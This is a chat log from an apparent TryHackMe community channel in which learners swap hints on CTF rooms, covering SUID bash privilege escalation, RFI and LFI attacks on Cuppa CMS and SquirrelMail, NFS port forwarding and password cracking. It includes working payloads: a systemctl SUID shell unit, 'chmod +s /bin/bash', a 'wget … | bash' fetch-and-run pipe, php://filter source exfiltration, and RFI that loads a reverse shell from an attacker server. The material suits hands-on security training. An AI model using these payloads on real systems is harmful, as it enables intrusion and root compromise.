ya so in that case the egid and the gid dont match so without -p the egid gets reset to the gid
Hm. And that would be the case with every suid, I guess.
i understood fundamentally what was going on, but now i really understand what's happening. @white salmon thanks for taking me down this yellow brick road
Gave +1 Rep to @versed shadow
@white salmon based on what the man page for bash says...i dont know about every suid binary though
probably some of them dont have -p (or equivalent)
@white salmon /bin/dash suid doesnt have -p flag and suid exploit is just: dash
so maybe that egid vs gid check only happens in bash (just only looked at /bin/dash so far)
I still need to digest all this. This room was a lot of information 😵‍💫 I am trying to understand it in a way that other bins are only executed once, whereas bash sets up an environment for all commands executed within it and therefore this gid/egid conflict needs to get solved.
Tell me your thoughts...
hrm...bash is like a VM? in that when you run bash, it sets up its own environment that is just for that bash ...vs like a vim suid, which uses the 'host' (to keep the VM analogy going)
Not...... at all, really.
That's my feeling :)) Maybe some Linux Guru could clarify this more :)
So a shell starts up, and pulls in shell config data, like environment variables that tell it where to look for stuff like executables.
a VM is much more segmented than that
A shell doesn't reserve big chunks of disk or memory or other hardware resources for its specific use
lol right on call
@umbral umbra i wasn't making a direct comparison to a VM, was trying to come up with an effective analogy and that's all i could come up with
the shell is the environment you work in to do stuff; opening a new shell usually doesn't pull in anything other than the standard config stuff, usually stored as a hidden file on your home folder
The original question was, why a bash suid needs -p and others don't.
@forest robin correct me
yah looking at other shell types on gtfobins under the suid...only bash has the -p, the rest just run the shell
@umbral umbra
each shell is a different program, and interact differently with the user
it's like expecting windows cmd.exe and PowerShell to be interchangeable
the commands might be similar, but they are written in different ways
@umbral umbra so why if a suid launches a shell you would not need the -p flag after the bash bin, whereas if you want to run a /bin/bash suid as root you need to add -p? I am not 100% clear
I was reading 2 or 3 times through that now and I'm not sure if I fully understand yet. But from what I understand, it's about the effective UID (the one the SUID bit is set to) and the real UID (the one of the user who started that process). So when you don't supply the -p flag, it's going to set the effective UID to the real UID, which will result in getting a bash shell as the user who started that process. I could be partially or even totally wrong, but that's my interpretation of what I read so far, but if anyone can correct me I'm more than happy to get a better explanation. So maybe you want to check that out yourself:
https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id
https://unix.stackexchange.com/questions/116792/privileged-mode-in-bash
So, this is along the lines what @forest robin wrote before. Thanks for the links! My question is still, why is the -p flag necessary only when running bash and not some other SUID binary.
Gave +1 Rep to @left thunder
I still have to read what they wrote there, but I am posting this question again before I got to sleep :)
I would assume because only bash is setting the effective UID to the real UID, but that's just a hard guess.
But why?
Not sure, but in case I have an answer to that once I'll come back to you
Heya! I'm doing the Linux PrivEsc room from the Jr. Pentester path, and I'm on q5, where the hint says to use wget to upload the script to the karen machine, but the karen user doesn't seem to have any kind of home directory so there doesn't seem to be anywhere the account has any write permissions, making it impossible to get the exploit script onto the machine. Any tips would be much appreciated aha
@severe rapids try /tmp
/tmp or /dev/shm might be writable
or (if this is like linenum) you could do: wget file -O - | bash
to have it piped straight into bash without touching the disk
sweet, this worked. Cheers
I'm trying to use netcat on the room what the shell and can't find a port to use with tun0
When I run an nmap scan it return that all ports are closed
Nvm I had to ssh in first
Very useful room
Hi all.
I'm just starting out on Walking an Application
I started my Attack Box but I can't open the URL for the lab. Keeps timing out.
I'm doing the very simple vulnversity and I have no idea why this payload isn't working
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash -i"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
I got it from here https://gtfobins.github.io/gtfobins/systemctl/#suid
im on ubuntu
so I don't need to add a -p to the /bin/sh
It runs as a service, so it's not going to give you an interactive shell session
Hello, everyone! Any hints for the last flag of the "Pickle Rick"?
Did you get to see all folders in / ?
Hmm, I'll check in a moment. I might've missed something there, thank you
Gave +1 Rep to @versed shadow
guys someone that could give a little nudge on Set?
not hints just directions to possibly look at
So I would have to use it to make another revshell
That's one way
I feel like I tried a bunch of other possibilities last night
Instead of getting a shell, you can get the output of /root/root.txt
I guess I always could, but that feels too much like playing the game
Hm?
Isn't that the last task of this room?
It is, but what I feel like it's using the meta knowing that it's the last task in the room
I like that, I'll get to doing that once I get home for the day
Im doing the phishing Emails 3 room and under phishing case2 the past question is really throwing me for a loop I tried all the running processes on the link provided. Im sure its right under my nose any ideas?
Last**
What windows process was flagged as Potentially Bad Traffic?
no surprise, it worked
Can you please share what you did?
I did "chmod +s /bin/bash" as the payload command
I was then able to do "bash -p" to be root
Congrats :)
For the pickle rick room, does getting the last ingredient imply privesc?
yes
hm, interesting. Thank you!
Gave +1 Rep to @honest wagon
Can I get a hint for the box "Chill hack" ?
||I have access for the user apaar but stuck at escalating to other users also got hashes from mysql ||
Room: Terminator
||I got to the point of RFI on Cuppa CMS. || @forest robin
Can someone help with a hint?
I feel like I'm enumerating wrong, I usually go into a directory then use the ls command then go on down the directory until I see something of interest, is there a better way of enumerating?
well, "tree" makes a helpful tree of all files and subdirectories but it's mostly not installed on THM machines
and don't use ls, use ls -la as most files are hidden with .file(.ssh is almost always hidden)
Yes I always use ls with a option also tree wasn't installed but now it's gonna make my life easier
try cracking them, then!
Thank you
You're welcome!
@junior wave you can do: find .
and it will recursively list all files (hidden as well) starting from the current working directory
one of the 1st things i do when i get a shell.
sudo -l
cd home; find .
cat /etc/crontab
@white salmon got the RFI, did you put up a reverse shell?
make sure you got your listener setup before doing that
once you are on the box, poke around. I have a good link for you regarding the privesc if you have trouble figuring it out
I guess I missed a step. What do you mean =http//your.XXXXXX ??? Does it not just send a GET to my Python server?!
@white salmon the =http:// is yourlocalpythonserverthatishosting/reverse_shell_code.php
the RFI
Congrats on the new colour. Much nicer with the color of your avatar
ahh lol i am back to green
1st, confirm you have paths and everything correct by doing the exploit path they show to grab ../../../../etc/passwd
i used curl since i was already in a terminal from starting the listener
hehe, i did that part. confirmed the exploit, then i did the RFI but somehow erased the urlConfig= part
Ha, got it!
so it was configField.phphttp://whatever, used curl, the browser, was getting no hits back, why isn't this working! took a break to eat lunch, came back and noticed the missing urlConfig= straight away...don't make my same mistake
Man, I did not know you can add http, I thought it's just local dirs
whenever you have an LFI like this...always try to fetch something remote because why not?
trying to get a reverse shell working from within the box somehow? i did that for about 20 minutes before i realized just fetching a shell would probably be easier
yeah sure
just got on, always spend a few minutes going through channels before i get started on todays challenge
So since I did not think of that, and shadow was unreachable so I did the following
OK
If you compose an email in Squirrelmail, and I guess also in other mail clients
and you add an attachment
before you click "Send" it stored somewhere
oh wow, that may work somehow...similar to log poisoning?
So there are default directories for that and I was trying to hit them with LFI
any luck?
the day 7 challenge from AoC. with the php-filters
you had to change your UserAgent to exploit code, then like visit a webpage so that got logged, then use an LFI (with the php://filters) to read the log file
/squirrelmail/var/local/attach/ could be or /data at the end. So then I was reading through to find where the config file for Squirrelmail is to get to the right path of the attachments directory, and then you popped up :))
i didn't try using any php filters on this one, most likely it would work?
Haven't done that, don't know what this is :-/
lets see if i can remember this command
Ah, like base64 encoding?
you would do like: whateverurl/page.php?urlConfig=php://filter/convert.base64-encode/resource=/file/to/encode
you can do that to exfil php source code
Yes, the CVE had an example of that to get to some config file with a username and password
squirrelmail is php so probably to get the config file you would have to use the above method. otherwise the server will render the page and you'll just get a blank page if you try to LFI it
Oh, I see
still got it up, let's try it
squirrelmail/config/config.php could be the one
and there should be a variable for the attach folder
ya /config/config.php looks right, there is a config/config.pl but that appears to set up everything
This is how I got to this
hrm...start simple and try to get the source for the squirrelmail/index.php
Let me try.
that makes sense, you don't want sensitive files accessible to the web server, even if php is gonna render the page and make it basically blank
or you know...instead of doing ../.../../index.php
do resource=alertConfigField.php
already in the folder with that file so that should work?
and lol did you root the box already or just taking a detour to try something?
I use find but it doesn't give me the file path
I was looking for something like PWD does
@junior wave hrm? find . gives you the path from your cwd
Ohhh find "." Sorry I didn't see that
I'll try that next time
I am still trying to get it done with Squirrel...
can do find . -ls as well
@white salmon able to read the alertConfigField.php file?
starting the box up so i can poke around with you
That's alertConfigField.php
ahh nice, that's the alertConfigField.php, decode it to make sure, might just be returning an error or something
What's the purpose of trying out this file? Not getting it
because LFI is trial and error, always try something super simple to make sure you are even going down a path that may work
if that url did not return base64 then we know the php://filter does not work
Got it
and trying to get the alertConfigField.php is the simplest since the exploit path is already there
so no need to fiddle with ../ pathing etc
now that we know that works, we can fiddle around and find other juicy files
now the theory is. Putting exploit code in a mail, then finding that mail and reading it, will give you a reverse shell
so now gotta find where squirrelmail stores mail, then use the LFI to read mail?
maybe send an exploit mail from dyson to dyson
so its guaranteed to be in the mailbox
I tried that already. But I am afraid that it's filled with all kinds of junk around it. Therefore I thought to do it differently
Compose a mail
Add an attached file (shell.php)
Do not send it yet
And now that uploaded attached file is stored somewhere
That I read already somewhere, once sent it's embedded in the email with everything else
Does this make sense?
yeah, then just find that file and use the LFI to 'read' it
which should (in theory) parse the attachment and run the exploit
hrm...except the LFI wont run the php code, just show blankness
So my first target is the config file of Squirrel to know the directory of the attachments...
Not good?!?
it should work because the exploit (alertConfigField.php) processes whatever you put in the urlConfig variable. so it processes the php if you try to LFI it (without the php://filter) and it process your shell.php from you python server
so if you can find the email and LFI it will process...only it all depends on how squirrelmail actually embeds the attachment into the email
if it embeds the attachment as ascii text it will work?
But I am not looking for an email
if it gets embedded as anything else (like base64 or even binary data) it will not work
@white salmon right, you're looking for the /attachments/attachment.file
?
Right, and before the email gets sent, it just sits in a folder they way you uploaded it
Once you send the email it gets embedded.
if you can find that and LFI it should work, again its 100% dependent on how squirrelmail stores that
well, not 100%? if squirrelmail base64'd it...you could probably use the php filter to base64 decode it before reading it
instead of doing base64-encode, do base64-decode?
?
I mean, don't waste your time on my ideas. I am just playing around :)
nono, not a time waste, haha we could have discovered some kind of squirrelmail 0day
and like edison said "I haven't failed, I just found 10000 ways that don't work"
which means faster workflow next time since you know what NOT to do
Like that!
Now, I feel I don't even know where /squirrelmail is really. Have a feeling, not under root-directory.. you mentioned before something about config.pl?! did you find that file?
@forest robin
documentation always good to find file paths
could go extreme route and download squirrelmail to your system
untar it and poke around
from there docs looks like /usr/local/squirrelmail/
dunno if this helps or even on the same path your taking: https://www.exploit-db.com/exploits/41910
looks like that exploit is sending a mail to get a reverse shell
tried running it before. did not work for me. "unable to upload".
ahh
but don't take my word, I might have done it wrong.
Already did
and did you get any passwords?
yep
well, list /home and try to login as another user with those passwords (lateral move)
already tried
https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket try this for privesc
only the "Writable Docker Socket"
Hi
I'm in a room called how websites works and I need to find a way to inject a link in the HTML code.
I need a bit of guidance.
Solved it meanwhile?
Yep
I wanted to avoid watching the video
But I had to do it to see the hint where to place the code
I'm stuck in overpass3
I managed to || upload a webshell over ftp and get service shell, then su to paradox with the credentials from the ftp server (and then changed authorized_keys for convenience) ||
i couldn't find the service flag
but the main problem is that I can't do the horizontal privesc to james
i found the ||nfs export, but it's not accessible through remote, so i set up an ssh local forward. but when I try to mount the share it dumps me "mount.nfs: requested NFS version or transport protocol is not supported"||
I also couldn't find any obvious way to escalate to root.
hrm, havent done that room yet. but mount -t nfs --nfsvers=VERSION to specify?
i tried version 2,3 and 4, none of which work
i also tried to find the service flag with find / -uid 48 2>/dev/null | grep -v "proc" | grep -i "THM"
where id 48 is the apache user
sudo mount -t nfs --nfsvers=2 localhost:/home/james mount
mount: unrecognized option '--nfsvers=2'
Try 'mount --help' for more information. [ 3,362s ]
❯ sudo mount -t nfs -o nfsvers=2 localhost:/home/james mount
mount.nfs: requested NFS version or transport protocol is not supported [ 0,301s ]
❯ sudo mount -t nfs -o nfsvers=3 localhost:/home/james mount
mount.nfs: requested NFS version or transport protocol is not supported [ 0,289s ]
❯ sudo mount -t nfs -o nfsvers=4 localhost:/home/james mount
mount.nfs: requested NFS version or transport protocol is not supported
also nfsver=x
does nfs require rpcbind on port 111?
because I can't create a local listener for it for some reason.
sudo ssh -i overpass_key -L 111:10.10.157.76:111 paradox@10.10.157.76 -N -oStrictHostKeyChecking=no
bind [127.0.0.1]:111: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 111
Could not request local forwarding.
i checked netstat -l, but port 111 doesn't show up there.
awhile ago i tried to setup a very restrictive firewall, i do recall having to open 2-3 ports for NFS to function properly
ss -tlnp doesnt show 111?
@deft siren and a small tip that will save you time. instead of starting another ssh session to do your port forward.
1st ssh to the box, then on a blank line type:
~C
it will drop you into an ssh> shell and you can setup port forwards
handy to do stuff in ssh without having to open another connection
well i have a root shell
and I still can't find that stupid flag for the web
:(
is there a better way than this?
suid_bash-4.4# cd /home/james
suid_bash-4.4# grep --recursive "thm{" 2>/dev/null
user.flag:thm{****************}
suid_bash-4.4# cd /
suid_bash-4.4# grep --recursive "thm{" 2>/dev/null | grep -v "Binary file"
hrm, try doing find / -type f -iname '*.txt' 2>/dev/null
dont look for the flag, look for the file
i tried that already. no dice
and not all flags have THM{
i have ran across several that were just a string of characters
find / -name "*.flag" -type f
/root/root.flag
/usr/share/httpd/web.flag
/home/james/user.flag
there we go
jeez
-rw-r--r--. 1 root root 38 Nov 17 2020 web.flag
This flag belongs to apache
LIES!!!
that's why I didn't find it
i did find / -uid 48 2>/dev/null | grep -v "proc" and didn't find it
uid48 being apache user
@whole oyster do: john --list=formats | grep md5
you might have the baby version of john
john -h should show something like:
in one of the john the ripper rooms they mention a the top of the challenge about making sure to get the jumbo john
lemme find that, the info will be useful to you i think
apt search john doesn't show jumbo, might have to build from source
hrm..not sure that would work?
you can do a symlink
like ln -s /usr/share/seclists/passwords/rockyou.txt rockyou.txt
then just go to whatever dir you ran that above command
like i do my hash cracking from /home/user/working
and in /home/user/working i have a symlink called rockyou.txt that points to /usr/share/seclists/passwords/rockyou.txt
so doing (from /home/user/working) john --wordlist=rockyou.txt hash_file works
what doesnt work about it?
ls -la, do you have a line like
head -n 5 rockyou.txt
does it show the top 5 lines of the file?
maybe that alias you set is causing an issue?
john --wordlist=rockyou.txt hash
shouldnt care if its a symlink or not
in room intro to x86-64 how to solve crackme2
@forest robin Back to Skynet :) After I rooted it, I managed to find the directory where SquirrelMail is storing temporarily the attachments. The content of the files does not get changed, but the files name does. I can still not figure out which format this is. Any ideas? (In the SS you can see the uploaded test.txt how it got changed)
what does: file <thatstringthatlookslikeahash> say?
Ascii text
Yes. I uploaded it in Squirrelmail as an attachment
Just random?
yeah oftentimes when you upload something, the server will rename the file to something random
or prepend / append some random string
so like file.jpg would become like file-53jfojf9283ut5r321oij.jpg or even gjao82jio.jpg on the server
its still a .jpg. in this case they dont put any extension
but ascii text is just a text file
So I guess my plan of uploading a shell as an attachment and then calling it isn't gonna work as I don't know what the file is called once uploaded...